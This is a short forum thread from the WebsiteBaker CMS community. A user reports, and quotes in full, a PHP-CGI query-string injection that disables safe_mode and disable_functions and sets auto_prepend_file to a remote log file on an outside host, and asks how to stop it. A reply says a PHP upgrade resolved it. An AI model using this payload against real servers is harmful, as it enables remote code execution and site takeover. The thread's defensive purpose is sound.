WebsiteBaker 2.13.8 is now available!
R.I.P Dietmar (luisehahne) and thank you for all your valuable work for WBhttps://forum.websitebaker.org/index.php/topic,32355.0.html
?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log
I'm using the most recent version but this version is not very secure....Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:Code: [Select]?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.logAs you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.What can be done the intercept query string like these?
I'm using the most recent version but this version is not very secure....Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.What can be done the intercept query string like these?
Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in query string is ignored.